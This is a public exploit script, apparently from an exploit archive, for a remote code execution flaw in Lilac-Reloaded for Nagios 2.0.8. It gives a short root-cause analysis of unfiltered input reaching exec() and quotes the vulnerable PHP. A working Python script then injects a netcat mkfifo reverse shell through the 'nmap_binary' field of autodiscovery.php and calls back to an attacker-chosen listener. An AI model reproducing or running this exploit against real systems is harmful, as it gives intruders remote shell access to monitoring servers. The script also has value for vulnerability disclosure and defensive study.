Share
## https://sploitus.com/exploit?id=PACKETSTORM:171940
#!/usr/bin/env python  
  
"""  
# Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)  
# Google Dork: N/A  
# Date: 2023-04-13  
# Exploit Author: max / Zoltan Padanyi  
# Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit  
# Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download  
# Version: 2.0.8  
# Tested on: Debian 7.6  
# CVE : N/A  
  
The autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ;  
  
Use at your own risk!  
  
RCA - wild exec is ongoing without any filtering  
  
in library/Net/Traceroute.php  
  
181 function _setTraceroutePath($sysname)  
182 {  
183 $status = '';  
184 $output = array();  
185 $traceroute_path = '';  
186  
187 if ("windows" == $sysname) {  
188 return "tracert";  
189 } else {  
190 $traceroute_path = exec("which traceroute", $output, $status);  
[...]  
257 function traceroute($host)  
258 {  
259  
260 $argList = $this->_createArgList();  
261 $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1];  
262 exec($cmd, $this->_result);  
  
  
"""  
  
import requests  
import argparse  
  
parser = argparse.ArgumentParser()  
parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True)  
parser.add_argument("-i", "--ip", help="Listener IP", required=True)  
parser.add_argument("-p", "--port", help="Listener port", required=True, type=int)  
args = parser.parse_args()  
  
rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;"  
  
body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"}  
  
try:  
r = requests.get(args.url)  
if r.ok:  
print("[+] URL looks good...moving forward...")  
print("[+] Sending exploit in...")  
r = requests.post(args.url,data=body)  
if r.ok:  
print("[+] Got HTTP 200, check your listener!")  
else:  
print("[-] Some kind of error happened, check the http response below!")  
print(r.text)  
except Exception as e:  
print("General exception: " + str(e))